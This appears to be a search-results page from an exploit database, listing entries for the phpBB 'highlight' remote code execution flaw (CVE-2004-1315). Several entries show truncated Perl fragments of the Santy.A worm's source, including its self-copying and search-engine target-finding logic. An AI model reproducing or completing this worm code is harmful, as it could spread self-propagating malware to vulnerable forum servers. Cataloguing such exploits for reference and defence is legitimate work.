5 matches found
CVE-2004-1315
viewtopic.php in phpBB 2.x before 2.0.11 improperly URL decodes the highlight parameter when extracting words and phrases to highlight, which allows remote attackers to execute arbitrary PHP code by double-encoding the highlight value so that special characters are inserted into the result, which...
phpBB 2.0.10 - Santy.A Worm highlight Arbitrary File Upload
phpBB 2.0.10 - Santy.A Worm highlight Arbitrary File Upload Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0; while!GrabURL'http://www.google.com/advancedsearch' if$generation 3 PayLoad ; else exit; $self = s/my $generation = \d+;/'my $generation = ' . $1 + 1...
phpBB highlight Arbitrary File Upload (Santy.A)
Exploit for unknown platform in category web applications =============================================== phpBB highlight Arbitrary File Upload Santy.A =============================================== Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0;...
phpBB < 2.0.10 - 'Santy.A Worm' 'highlight' Arbitrary File Upload
Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0; while!GrabURL'http://www.google.com/advancedsearch' if$generation 3 PayLoad ; else exit; $self = s/my $generation = \d+;/'my $generation = ' . $1 + 1 . ';'/e; my $selfFileName = 'm1ho2of'; my $markStr =...
CVE-2004-1315
viewtopic.php in phpBB 2.x before 2.0.11 improperly URL decodes the highlight parameter when extracting words and phrases to highlight, which allows remote attackers to execute arbitrary PHP code by double-encoding the highlight value so that special characters are inserted into the result, which...